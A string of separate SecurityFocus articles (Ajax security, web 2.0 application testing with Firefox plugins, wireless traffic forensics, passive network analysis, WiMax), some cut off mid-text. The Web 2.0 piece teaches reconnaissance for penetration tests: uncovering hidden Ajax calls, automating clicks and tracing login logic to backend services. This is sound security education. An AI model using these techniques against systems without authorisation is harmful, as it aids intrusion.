An good example is Google Suggest where the application receives a JavaScript snippet which gets evaluated and shows up as possible suggestions to complete the query entered. This behavior can be problematic for the manual tester as well someone using automated tools. Either one will have to understand the context around how the JavaScript is being used in the web application. Close attention needs to be paid when an input parameter is sent back which becomes evaluated on the client side. This might sound like typical XSS and it is, but it has just become so much easier to exploit. Applications which perform blacklist validation are even more susceptible because attackers don't need to inject as many tags. Several methods have been available to use XSS without the script tag in the past as well.

* XML Fuzzing

Ajax can be used to send requests and receive responses in XML format. Simplistic automated tools do understand GET and POST methods but may not understand how to deal with information encapsulated using the XML format.

The tester has to ensure that developers have not deviated from a secure architecture. In a secure system, the security controls are implemented in an environment which is outside the control of the end user. While performing reviews, one must look through the client side code to determine if it is somehow modifying the state of variables (cookies, FORM parameters, GET parameters) before submitting them to the server. Any time this happens, the JavaScript code needs to analyzed to determine the reasoning for this.

Just like typical web applications, all Ajax requests should be tested for authorization issues. Developers might fall victim to believing that just because a page is called behind the scenes through the use of a client-side scripting engine, that authorization isn't necessary. This is not the case.
5. Conclusion

Ajax applications provide new possibilities through its highly interactive nature. Developers should be weary of new insecurities introduced by these capabilities. Security testers must augment their methodology and toolset to handle Ajax applications.

In this article, the authors have provided an introduction to some of the security implications found in Ajax technologies. Penetration testers are seeing that they have the knowledge and tools to evaluate Ajax applications, but that they are somewhat more difficult to test. Future articles will look at more areas of concern as well as helpful tools that can be used with Ajax security testing.
6. References

[ref 1] Google Suggest and Google Maps, two early Ajax applications.

[ref 2] Stewart Twynham, "AJAX Security", Feb. 16th, 2006.

[ref 3] Andrew van der Stock, "AJAX Security", OWASP Presentation given on February 7, 2006. A direct descendent of this presentation is also available from Andrew van der Stock at http://www.greebo.net/owasp/ajax_security.pdf.

[ref 4] Microsoft's Altas framework tries to integrate as a middle-tier.

[ref 5] Post by "Samy," on a "Technical explanation of the MySpace worm".

[ref 6] Burp web application proxy for penetration testing.

[ref 7] Paros web application proxy for penetration testing.

[ref 8] post by Rogan Dawes, author of WebScarab, on the WebAppSec mailing list.
7. Further reading

* Jesse James Garrett, "Ajax: A New Approach to Web Applications", Feb. 18, 2005.

* Ryan Asleson and Nathaniel T. Schutta, "Foundations of Ajax", APress Publications, Oct 2005.

* Nicholas C. Zakas, Jeremy McPeakandJoe Fawcett, "Wrox Professional Ajax", Feb 2006.

* Eric Pascarello, "Eric Pascarello dissects Ajax security vulnerabilities", Feb. 07, 2006.

* Andrew van der Stock, "Ajax and Other 'Rich' Interface Technologies".

8. About the authors
Jaswinder S. Hayre, CISSP, and Jayasankar Kelath, CISSP, are both Sr. Security Engineers with Ernst & Young's Advanced Security Center in New York.

SecurityFocus accepts Infocus article submissions from members of the security community. Articles are published based on outstanding merit and level of technical detail. Full submission guidelines can be found at http://www.securityfocus.com/static/submissions.html.

Hacking Web 2.0 Applications with Firefox

Introduction

AJAX and interactive web services form the backbone of “web 2.0” applications. This technological transformation brings about new challenges for security professionals.

This article looks at some of the methods, tools and tricks to dissect web 2.0 applications (including Ajax) and discover security holes using Firefox and its plugins. The key learning objectives of this article are to understand the:

  • web 2.0 application architecture and its security concerns.
  • hacking challenges such as discovering hidden calls, crawling issues, and Ajax side logic discovery.
  • discovery of XHR calls with the Firebug tool.
  • simulation of browser event automation with the Chickenfoot plugin.
  • debugging of applications from a security standpoint, using the Firebug debugger.
  • methodical approach to vulnerability detection.

Web 2.0 application overview

The newly coined term “web 2.0” refers to the next generation of web applications that have logically evolved with the adoption of new technological vectors. XML-driven web services that are running on SOAP, XML-RPC and REST are empowering server-side components. New applications offer powerful end-user interfaces by utilizing Ajax and rich internet application (Flash) components.

This technological shift has an impact on the overall architecture of web applications and the communication mechanism between client and server. At the same time, this shift has opened up new security concerns [ref 1] and challenges.

New worms such as Yamanner, Samy and Spaceflash are exploiting “client-side” AJAX frameworks, providing new avenues of attack and compromising confidential information.

Figure 1.
Figure 1. Web 2.0 architecture layout.

As shown in Figure 1, the browser processes on the left can be divided into the following layers:

  • Presentation layer - HTML/CSS provides the overall appearance to the application in the browser window.
  • Logic & Process - JavaScript running in the browser empowers applications to execute business and communication logic. AJAX-driven components reside in this layer.
  • Transport - XMLHttpRequest (XHR) [ref 2]. This object empowers asynchronous communication capabilities and XML exchange mechanism between client and server over HTTP(S).

The server-side components on the right of Figure 1 that typically reside in the corporate infrastructure behind a firewall may include deployed web services along with traditional web application resources. An Ajax resource running on the browser can directly talk to XML-based web services and exchange information without refreshing the page. This entire communication is hidden from the end-user, in other words the end-user would not “feel” any redirects. The use of a “Refresh” and “Redirects” were an integral part of the first generation of web application logic. In the web 2.0 framework they are reduced substantially by implementing Ajax.

Web 2.0 assessment challenges

In this asynchronous framework, the application does not have many “Refreshes” and “Redirects”. As a result, many interesting server-side resources that can be exploited by an attacker are hidden. The following are three important challenges for security people trying to understand web 2.0 applications:

  1. Discovering hidden calls - It is imperative that one identify XHR-driven calls generated by the loaded page in the browser. It uses JavaScript over HTTP(S) to make these calls to the backend servers.
  2. Crawling challenges - Traditional crawler applications fail on two key fronts: one, to replicate browser behavior and two, to identify key server-side resources in the process. If a resource is accessed by an XHR object via JavaScript, then it is more than likely that the crawling application may not pick it up at all.
  3. Logic discovery - Web applications today are loaded with JavaScript and it is difficult to isolate the logic for a particular event. Each HTML page may load three or four JavaScript resources from the server. Each of these files may have many functions, but the event may be using only a very small part of all these files for its execution logic.

We need to investigate and identify the methodology and tools to overcome these hurdles during a web application assessment. For the purpose of this article, we will use Firefox as our browser and try to leverage some of its plugins to combat the above challenges.

Discovering hidden calls

Web 2.0 applications may load a single page from the server but may make several XHR object calls when constructing the final page. These calls may pull content or JavaScript from the server asynchronously. In such a scenario, the challenge is to determine all XHR calls and resources pulled from the server. This is information that could help in identifying all possible resources and associated vulnerabilities. Let's start with a simple example.

Suppose we can get today’s business news by visiting a simple news portal located at:

http://example.com/news.aspx

The page in the browser would resemble the screenshot illustrated below in Figure 2.

Figure 2.
Figure 2. A simple news portal page.

Being a web 2.0 application, Ajax calls are made to the server using an XHR object. We can determine these calls by using a tool known as Firebug [ref 3]. Firebug is a plug-in to the Firefox browser and has the ability to identify XHR object calls.

Prior to browsing a page with the plugin, ensure the option to intercept XHR calls is selected, as shown in Figure 3.

Figure 3.
Figure 3. Setting Firebug to intercept XMLHttpRequest calls.

With the Firebug option to intercept XMLHttpRequest calls enabled, we browse the same page to discover all XHR object calls made by this particular page to the server. This exchange is shown in Figure 4.

Figure 4.
Figure 4. Capturing Ajax calls.

We can see several requests made by the browser using XHR. It has loaded the dojo AJAX framework from the server while simultaneously making a call to a resource on the server to fetch news articles.

http://example.com/ getnews.aspx?date=09262006

If we closely look at the code, we can see following function in JavaScript:

function getNews()

{
var http;
http = new XMLHttpRequest();
http.open("GET", " getnews.aspx?date=09262006", true);
http.onreadystatechange = function()
{
if (http.readyState == 4) {
var response = http.responseText;
document.getElementById('result').innerHTML = response;
}
}
http.send(null);
}

The preceding code makes an asynchronous call to the backend web server and asks for the resource getnews.aspx?date=09262006. The content of this page is placed at the ‘result’ id location in the resulting HTML page. This is clearly an Ajax call using the XHR object.

By analyzing the application in this format, we can identify vulnerable internal URLs, querystrings and POST requests as well. For example, again using the above case, the parameter “date” is vulnerable to an SQL injection attack.

continued


[ref 1] Ajax security, http://www.securityfocus.com/infocus/1868
[ref 2] XHR Object specification, http://www.w3.org/TR/XMLHttpRequest/
[ref 3] Firebug download, https://addons.mozilla.org/firefox/1843/; Firebug usage, http://www.joehewitt.com/software/firebug/docs.php

Crawling challenges and browser simulation

An important reconnaissance tool when performing web application assessment is a web crawler. A web crawler crawls every single page and collects all HREFs (links). But what if these HREFs point to a JavaScript function that makes Ajax calls using the XHR object? The web crawler may miss this information altogether.

In many cases it becomes very difficult to simulate this environment. For example, here is a set of simple links:

The “go1” link when clicked will execute the getMe() function. The code for getMe() function is as shown below. Note that this function may be implemented in a completely separate file.

function getMe()

{
var http;
http = new XMLHttpRequest();
http.open("GET", "hi.html", true);
http.onreadystatechange = function()
{
if (http.readyState == 4) {
var response = http.responseText;
document.getElementById('result').innerHTML = response;
}
}
http.send(null);
}

The preceding code makes a simple Ajax call to the hi.html resource on the server.

Is it possible to simulate this click using automation? Yes! Here is one approach using the Firefox plug-in Chickenfoot [ref 4] that provides JavaScript-based APIs and extends the programmable interface to the browser.

By using the Chickenfoot plugin, you can write simple JavaScript to automate browser behavior. With this methodology, simple tasks such as crawling web pages can be automated with ease. For example, the following simple script will “click” all anchors with onClick events. The advantage of this plug-in over traditional web crawlers is distinct: each of these onClick events makes backend XHR-based AJAX calls which may be missed by crawlers because crawlers try to parse JavaScript and collect possible links but cannot replace actual onClick events.

l=find('link')

for(i=0;ia = document.links[i];
test = a.onclick;
if(!(test== null)){
var e = document.createEvent('MouseEvents');
e.initMouseEvent('click',true,true,document.defaultView,1,0,0,0,
0,false,false,false,false,0,null);
a.dispatchEvent(e);
}
}

You can load this script in the Chickenfoot console and run it as shown in Figure 5.

Figure 5.
Figure 5. Simulating onClick AJAX call with chickenfoot.

This way, one can create JavaScript and assess AJAX-based applications from within the Firefox browser. There are several API calls [ref 5] that can be used in the chickenfoot plugin. A useful one is the “fetch” command to build a crawling utility.

Logic discovery & dissecting applications

To dissect client-side Ajax-based applications, one needs to go through each of the events very carefully in order to determine process logic. One way of determining the entire logic is to walk through each line of code. Often, each of these event calls process just a few functions from specific files only. Hence, one needs to use a technique to step through the relevant code that gets executed in a browser.

There are a few powerful debuggers for JavaScript that can be used to achieve the above objective. Firebug is one of them. Another one is venkman [ref 6]. We shall use Firebug again in our example.

Let’s take a simple example of a login process. The login.html page accepts a username and password from the end-user, as shown in Figure 6. Use the “inspect” feature of Firebug to determine the property of the form.

Figure 6.
Figure 6. Form property inspection with Firebug.

After inspecting the form property, it is clear that a call is made to the “auth” function. We can now go to the debugger feature of Firebug as illustrated in Figure 7 and isolate internal logic for a particular event.

Figure 7.
Figure 7. Debugging with Firebug.

All JavaScript dependencies of this particular page can be viewed. Calls are made to the ajaxlib.js and validation.js scripts. These two scripts must have several functions. It can be deduced that the login process utilizes some of these functions. We can use a “breakpoint” to step through the entire application. Once a breakpoint is set, we can input credential information, click the “Submit” button and control the execution process. In our example, we have set a breakpoint in the “auth” function as shown in Figure 8.

Figure 8.
Figure 8. Setting a breakpoint and controlling execution process.

We now step through the debugging process by clicking the “step in” button, which was highlighted in Figure 8. JavaScript execution moves to another function, userval, residing in the file validation.js as shown in Figure 9.

Figure 9.
Figure 9. Moving to validation.js script page.

The preceding screenshot shows the regular expression pattern used to validate the username field. Once validation is done execution moves to another function callGetMethod as shown in Figure 10.

Figure 10.
Figure 10. Making an Ajax call.

Finally, at the end of the execution sequence, we can observe the call to backend web services as being made by the XHR object. This is shown in Figure 11.

Figure 11.
Figure 11. Web services call on the Firebug console.

Here we have identified the resource location for the backend web services:

http://example.com/2/auth/ws/login.asmx/getSecurityToken?username=amish&password=amish

The preceding resource is clearly some web services running under the .NET framework. This entire dissection process has thrown up an interesting detail: we've found a user validation routine that can be bypassed very easily. It is a potential security threat to the web application.

Taking our assessment further, we can now access the web service and its endpoints by using a WSDL file and directly bruteforce the service. We can launch several different injection attacks - SQL or XPATH - with tools such as wsChess [ref 7].

In this particular case, the application is vulnerable to an XPATH injection. The methodology for web services assessment overall is different and is outside the scope of this article. However this walkthrough technique helps identify several client-side attacks such as XSS, DOM manipulation attacks, client-side security control bypassing, malicious Ajax code execution, and so on.

Conclusion

Service-oriented architecture (SOA), Ajax, Rich Internet Applications (RIA) and web services are critical components to next generation web applications. To keep pace with these technologies and combat next-generation application security challenges, one needs to design and develop different methodologies and tools. One of the efficient methodologies of assessing applications is by effectively using a browser.

In this article we have seen three techniques to assess web 2.0 applications. By using these methodologies it is possible to identify and isolate several Ajax-related vulnerabilities. Browser automation scripting can assist us in web asset profiling and discovery, that in turn can help in identifying vulnerable server-side resources.

Next generation applications use JavaScript extensively. Smooth debugging tools are our knights in shining armor. The overall techniques covered in this article is a good starting point for web 2.0 assessments using Firefox.

References

[ref 1] Ajax security,
http://www.securityfocus.com/infocus/1868
[ref 2] XHR Object specification, http://www.w3.org/TR/XMLHttpRequest/
[ref 3] Firebug download, https://addons.mozilla.org/firefox/1843/; Firebug usage, http://www.joehewitt.com/software/firebug/docs.php
[ref 4] Chickenfoot quick start, http://groups.csail.mit.edu/uid/chickenfoot/quickstart.html
[ref 5] Chickenfoot API reference - http://groups.csail.mit.edu/uid/chickenfoot/api.html
[ref 6] Venkman walkthrough, http://www.mozilla.org/projects/venkman/venkman-walkthrough.html
[ref 7] wsChess, http://net-square.com/wschess

About the author

Shreeraj Shah, BE, MSCS, MBA, is the founder of Net Square and leads Net Square’s consulting, training and R&D activities. He previously worked with Foundstone, Chase Manhattan Bank and IBM. He is also the author of Hacking Web Services (Thomson) and co-author of Web Hacking: Attacks and Defense (Addison-Wesley). In addition, he has published several advisories, tools, and whitepapers, and has presented at numerous conferences including RSA, AusCERT, InfosecWorld (Misti), HackInTheBox, Blackhat, OSCON, Bellua, Syscan, etc. You can read his blog at http://shreeraj.blogspot.com/.

Reprints or translations

Reprint or translation requests require prior approval from SecurityFocus.

© 2006 SecurityFocus

Comments?

Public comments for Infocus articles, below, require technical merit to be published. General comments, article suggestions and feedback are encouraged but should be sent to the editorial team instead.


SecurityFocus accepts Infocus article submissions from members of the security community. Articles are published based on outstanding merit and level of technical detail. Full sub

Wireless Forensics: Tapping the Air - Part Two

Wireless Forensics: Tapping the Air - Part Two
Raul Siles, GSE 2007-01-08

Introduction

In part one of this series, we discussed the technical challenges for wireless traffic acquisition and provided design requirements and best practices for wireless forensics tools. In this second article, we take it a step further and focus on the technical challenges for wireless traffic analysis. Additionally, advanced anti-forensic techniques that could thwart a forensic investigation are analyzed. Finally, apart from the technical details, as a forensic write-up, the article covers some legal aspects about wireless forensics for both the U.S. and Europe.

Wireless forensics: Technical considerations for traffic analysis

Once the traffic has been collected by the forensic examiner, it must be analyzed to draw some conclusion about the case. The main technical considerations, tools and challenges associated to the analysis of 802.11 traffic from a wireless forensics perspective are presented below.

The scope of the article is to focus on wireless forensics from the traffic point of view, although in a real scenario, there are other sources of information to complement the data related with the case. These sources of information would include access points and wired network devices logs, ARP and CAM tables, and the data collected by wireless IDS.

Network Forensic Analysis Tools (NFAT): Commercial and open-source traffic analysis tools

The analysis of wireless traffic demands the same capabilities required in pure wired network forensics, that is, an in-depth understanding of the protocols involved in the data communications collected. For wireless, this commonly means TCP/IP-based protocols over 802.11.

The set of network tools used to analyze traffic from a forensic perspective is commonly called NFAT (Network Forensic Analysis Tool), a term coined in 2002. The major commercial players in the wired field are Sandstorm NetIntercept [ref 1], Niksun NetVCR [ref 2] and eTrust Network Forensics [ref 3]. Wireless forensics would require these tools to provide wireless traffic analysis capabilities, that is, advanced analysis functions for the specific 802.11 headers and protocol flows and behaviors. At the time of this writing, both NetIntercept and eTrust NF state 802.11 capabilities.

From an open-source perspective, there are no well-known, dedicated NFAT alternatives. However, there are multiple tools [ref 4] that provide network traffic analysis capabilities that are very useful for the forensic examiner to find specific pieces of information in the evidence collected.

Simplifying things, the graphical Wireshark [ref 5] protocol dissector is used to inspect in-depth every field of the frames captured, ngrep (network grep) [ref 6] is used to search for specific strings in the contents of the frames, and the text-based tcpdump [ref 7] or tshark [ref 5] sniffers are used to automate and script the analysis of certain tasks, such as filtering traffic based on specific conditions. Most commercial and open-source tools support the standardized Pcap file format (referenced in the first part of this article) for interoperability and data exchange purposes.

Analyzing wireless traffic

The traffic analysis process involves multiple tasks, such as data normalization and mining (to be able to easily manipulate and search through the data obtained), traffic pattern recognition (required to identify anomalies and suspicious patterns), protocol dissection (very relevant for understanding all the different protocol header fields and their contents) and the reconstruction of application sessions (to obtain application-level visualization).

The coverage of all these areas (very similar to standard traffic analysis for wired networks) could require its own book, therefore, this section contains specific technical issues that should be considered during the analysis phase for wireless traffic. These issues include merging traffic from multiple channels, managing traffic from overlapping channels, filtering capabilities and fast analysis. One of the main particular challenges associated with wireless forensics is related to the built-in 802.11 layer-2 encryption features of this technology. This aspect is covered in the next section.

One of the first wireless analysis issues to consider is the merge of the capture files corresponding to all the individual channels. When using a multi-card device, as the one suggested on the first part of this article, each card listens to a specific channel and collects data for this channel in a single Pcap file.

In some scenarios, such as with roaming clients, it is required to merge the data from various channels to reconstruct the roaming session. For this purpose, it is possible to use the mergecap tool included with Wireshark. The tool allows one to merge multiple capture files in a single output Pcap file (-w option), as shown below:

# mergecap -w all_channels.pcap channel_1.pcap channel_2.pcap ... channel_14.pcap

Wireshark also provides a menu option, “File – Merge...” to merge two Pcap files. This is required to merge the packets chronologically to reflect the traffic over the time.

An example has been made available to the reader to follow along [ref 8]. It is a slightly modified version of a file capture provided by Aircapture, and includes two Pcap files containing a VoIP session from a roaming client switching between two access points, from channel 11 to channel 1. The example is provided so that the reader can test the merging functionality using Wireshark and reconstruct the audio conversation (that, by the way, contains a commercial message) for this VoIP session. The details about how to use Wireshark (previously called Ethereal) to reconstruct the VoIP RTP protocol sessions have been detailed in a previous SecurityFocus article [ref 9]. The briefly summarized steps for the new Wireshark version are:

  • Decode RTP packets: Select the first RTP packet in the Pcap file and select “Statistics – RTP – Stream Analysis...”.
  • RTP Stream Analysis: Select “Save payload...” to store the media stream.
  • Save the audio: Select the “.au” format, the “forward” channel and the filename to save the audio stream that contains the voice captured.

Due to the lack of SIP packets, and the usage of 8000 as the source and destination ports, the RTP packets in the capture file for channel 1 are decoded by default in Wireshark as OICQ packets. It is required to decode them as RTP; this can be accomplished by selecting any OICQ packet, go to “Analyze – Decode As...”, find and select the RTP protocol and click OK.

To get the most from this exercise, it is recommended that the reader first reconstruct and listen to the media stream for the two individual files, and then merge both into a single file, and reconstruct its media stream. The later contains the concatenation of the media stream fragments captured from each wireless channel. At about 30 seconds into the playback, the roaming takes place.

Additionally, another wireless analysis issue to consider is the fact that the capture file for a given channel might contain data from overlapping channels, that is, traffic from networks in adjacent channels. Based on the access point transmission and the analyst’s reception device capabilities, such as the output transmission (Tx) power, the reception (Rx) sensitivity, and the antennas used, it is possible to capture data from multiple channels simultaneously.

The capture file shown below in Figure 1, which is also available to the reader [ref 10], corresponds to the beacon frames of a capture session on channel 9. The sniffer collected traffic from channels 9 (Null SSID and SSID “WLAN_7B”), 11 (SSID “WopR”) and 12 (SSID “ANA”). The channel information is included in the beacon frame, specifically, in the “DS Parameter set: Current Channel” field of the “Tagged parameters” section inside the “IEEE 802.11 wireless LAN management frame” header.


Figure 1. Beacons frames from multiple channels captured from channel 9.

Therefore, during the analysis phase it is necessary to identify and discard duplicated frames and manage these kind of multi-channel interferences and collisions.

Probably, the most commonly used feature when dealing with huge amounts of information is the traffic analyzer filtering capabilities. Once the traffic has been merged in a single Pcap file, for example, filters allow one to display the traffic associated to a single client across all channels, based on its MAC address, or display just the traffic from a single access point, based on its BSSID address, or only display data frames (versus management and control frames). The filtering options in tools like Wireshark are uncountable [ref 11] and something the forensic examiner must get familiarized with.

Finally, there is a relatively new open-source tool to parse single or multiple Pcap files and produce an initial analysis report identifying significant traffic events, statistics and flows, called Honeysnap [ref 12]. It provides security analysts a pre-processed list of high value network activity, aimed at focusing manual forensic analysis and saving relevant incident investigation time.

Although it was designed as a honeynet-related tool to quickly analyze the data collected by a honeynet, it could be very helpful for the network forensic investigator to draw initial facts about the traffic collected. Once the analyst has identified data that interests him, he can then use other tools for more in depth analysis. Currently, the tool can decode TCP and UDP-based protocols, such as HTTP, IRC or DNS, but does not have wireless capabilities, therefore, it is only useful on the wireless unencrypted traffic. However, due to its extensible modular infrastructure, it can be easily modified to include the wireless knowledge required for forensics analysis.

Continued on page 2... (link below)



[ref 1] Sandstorm NetIntercept. http://www.sandstorm.net/products/netintercept/
[ref 2] Niksun NetVCR. http://www.niksun.com/Products_NetVCR.htm
[ref 3] eTrust Network Forensics. http://www3.ca.com/solutions/Product.aspx?ID=4856
[ref 4] “Summary of tools commonly used to support network forensic investigations”. http://searchsecurity.techtarget.com/searchSecurity/
downloads/NetworkForensicToolsSidebar.pdf

[ref 5] Wireshark & tshark. http://www.wireshark.org
[ref 6] ngrep (network grep). http://ngrep.sourceforge.net
[ref 7] tcpdump. http://www.tcpdump.org
[ref 8] “Pcap files containing a roaming VoIP session”. http://www.raulsiles.com/downloads/VoIP_roaming_session.zip
[ref 9] “Two attacks against VoIP”. Peter Thermos. April 2006. http://www.securityfocus.com/print/infocus/1862
[ref 10] “Pcap file containing traffic from multiple channels and captured from a single channel, 9”. http://www.raulsiles.com/downloads/multi_channel_beacons.pcap
[ref 11] “Wireshark & Ethereal Network Protocol Analyzer Toolkit”. Angela Orebaugh, Gilbert Ramirez, Jay Beale (Series Editor). Syngress. ISBN: 1597490733. Chapter 5 – “Filters”: http://www.syngress.com/book_catalog/377_Eth_2e/sample.pdf
[ref 12] Honeysnap. The Honeynet Project. 2006. http://www.honeynet.org/tools/honeysnap/

assive Network Analysis

Passive Network Analysis
Stephen Barish 2007-09-28

In sports, it's pretty much accepted wisdom that home teams have the advantage; that's why teams with winning records on the road do so well in the playoffs. But for some reason we rarely think about "the home field advantage" when we look at defending our networks. After all, the best practice in architecting a secure network is a layered, defense-in-depth strategy. We use firewalls, DMZs, VPNs, and configure VLANs on our switches to control the flow of traffic into and through the perimeter, and use network and host-based IDS technology as sensors to alert us to intrusions.

These are all excellent security measures – and why they are considered "best practices" in the industry – but they all fall loosely into the same kind of protection that a castle did in the Middle Ages. While they act as barriers to deter and deny access to known, identifiable bad guys, they do very little to protect against unknown threats, or attackers that are already inside the enterprise, and they do little to help us understand our networks so we can better defend them. This is what playing the home field advantage is all about - knowing our networks better than our adversaries possibly can, and turning their techniques against them.

Paranoid? Or maybe just prudent...

Our objective is to find out as much as possible about our own networks. Ideally we could just stroll down and ask the IT folks for a detailed network topology, an identification of our address ranges and the commonly used ports and protocols on the network. It seems counter-intuitive, but smaller enterprises actually do better about tracing this kind of information than gigantic multinational companies, partially because there is less data to track, and also because security and IT tend to work better together in smaller organizations.

In fact, large companies have a real problem in this area, especially if their business model includes growth by acquisition of other companies. Sometimes the IT staff doesn't even know all the routes to the Internet, making it pretty tough to defend these amalgamated enterprises. This is especially common in organizations that grow through mergers and acquisition.

The first, most basic information, we need about our networks in order to defend them well is the network map. Traditionally, attackers and defenders use network mapping technologies such as nmap [1], which use a stimulus-response method to confirm the existence of a host (depending on the options used) to identify its operating system and open ports. This technique relies on non-RFC compliant responses to "odd" packets, and has been around a long time. (Fyodor provides a great paper [2] on the technique, and pretty much pioneered the field of active operating system identification.) Active network mapping is a very powerful technique, but it does have its limitations. It introduces a significant amount of traffic on the network, for one, and some of that traffic can cause problems for network applications. In some cases, nmap can cause operating system instability, although this has become less common in recent years. They also only provide a snapshot in time of the enterprise topology and composition. Also, active mapping tools generally have difficulties or limitations dealing with firewalls, NAT, and packet-filtering routers. Fortunately there are passive analysis techniques that generate similar results.

Passive Analysis Theory

Passive network analysis is much more than intrusion detection, although that is the form of it most commonly used. Passive techniques can map connections, identify ports and services in use in the network, and can even identify operating systems. Lance Spitzner of the Honeynet project [3] and Michael Zalewski [4] helped pioneer passive fingerprinting techniques that reliably identify operating systems from TCP/IP traces. Zalewski's p0f v 2.0.8 [5] is one of the best passive OS fingerprinting tools available, and is the one used in this article to demonstrate some of the capabilities of the technique.

The key to passive network analysis is understanding that it works almost the same as active mapping and OS fingerprinting. All passive techniques rely on a stimulus-response scenario; they just rely on someone else's stimulus and then collect the response (Figure 1).


Figure 1 – Active and Passive Network Analysis

In the active scenario, the target (A) responds to stimulus provided by our mapping engine, which is useful, but an artificial observation condition we created just to conduct the mapping exercise. In the passive scenario, the target (A) responds to stimuli resulting from normal use. In both cases we can see the ports and services involved, connection flow, timing information, and can make some educated guesses about our network's operating characteristics from the resulting data. But the passive technique allows something the active one does not: we can see the network from the perspective of the user and application behavior during normal operations.


WiMax: Just Another Security Challenge?

Wireless networks have long been hailed as easily deployed, low-cost solutions for providing broadband services to an increasingly mobile population. As with any emerging technology, however, it wasn't long before attackers were exploiting it.

The popular version of wireless networking, known as WiFi, revolutionized the ways that both small home-offices and larger facilities work, making it trivial to extend bandwidth into areas where it was impractical or too expensive to run Ethernet cable. For a while it seemed as if WiFi offered instantly deployable, easily configurable, and most importantly mobile communications to the masses.

Soon, however, over-the-air sniffers, such as kismet and airsnort, allowed attackers to capture and decode data transmitted via WiFi. Rogue access points -- often illicitly deployed by users seeking easier access -- opened security holes deep within companies' enterprises, allowing attackers to completely circumvent traditional protections, such as firewalls and IDS, and simply break in through a wide-open back door. These rogue access points also became a useful way for attackers to capture passwords, credit card numbers, and other sensitive information.

It didn't take long for information technology professionals to realize that the promised land of WiFi was rife with risks, vulnerabilities, and unforeseen dangers that still cause significant security challenges today.

In addition, WiFi has caused many technical headaches. Its effective coverage radius, also known as the "cell radius," is fairly small -- typically a few hundred feet when used with omnidirectional antennas like those in your typical laptop. WiFi also has pretty substantial bandwidth limitations that make it impractical for high-density user environments or as a last-mile transport-layer solution. Over the years these technical challenges, along with the security problems, have been addressed in large part by constantly evolving standards and bolting security controls on top of WiFi. Examples include Wired Equivalent Privacy (WEP) encryption, WiFi Protected Access (WAP) encryption, and 802.1x.

Yet, without using highly directional and large antennas, WiFi still wasn't the optimum solution for large metropolitan-scale or long-haul point-to-point links. This is the reason WiMax and similar standards were born.

Wireless Compared

WiFi WiMax
Recommended Uses Short-range, LAN-centric Long-range, MAN-centric
Spectrum Unlicensed spectrum
802.11b/g – 2.4 GHz
802.11n – 2.4 GHz, 5 GHz
Unlicensed or licensed spectrum between 2-66 GHz
US: 2.4 GHz
International: 2.3 GHz, 3.5 GHz
Quality of Service Minimal - QoS is relative only between packets/flows Guaranteed - QoS is assured using scheduling algorithms at MAC layer
Cell Footprint < 300 meters maximum
Most implementations about 30 meters
Up to 10 kilometers
Most implementations about 3 km
Bandwidth 802.11b: 11 Mbps max
802.11g: 54 Mbps max
802.11n: at least 100 MbpsAll bandwidth is at short range
Up to 70 Mbps theoretical max
Up to 40 dedicated subscriber channels
Expect 15 Mbps at 3 km range
Table 1 - A comparison of typical WiFi and WiMax performance characteristics

WiMax refers to a standard designed to provide high-bandwidth wireless services on a metropolitan area scale. It provides a much greater bandwidth in comparison to WiFi, allowing users to share up to 70 Mbps at short range -- although 10 Mbps at 10 km is more typical -- per channel in fixed implementations. Each channel can be split between up to 40 simultaneous users, providing symmetric download speeds that rival a traditional DSL connection.

While WiFi has moved into high-bandwidth solutions with the advent of the draft 802.11n specification, which provides theoretical bandwidth maximums up to 248 Mbps, the true advantage WiMax maintains is in cell radius. Even with 802.11n, WiFi is typically limited to ranges under 300 meters without specialized equipment. In contrast, WiMax provides a much larger cell radius -- up to 3 km in fixed applications -- without significantly degrading its available bandwidth. These key features are the reason the WiMax standard is considered one of the leading contenders for the future of wireless broadband, for use in metropolitan area networks (MAN) and as the underpinnings of 4G cellular networks.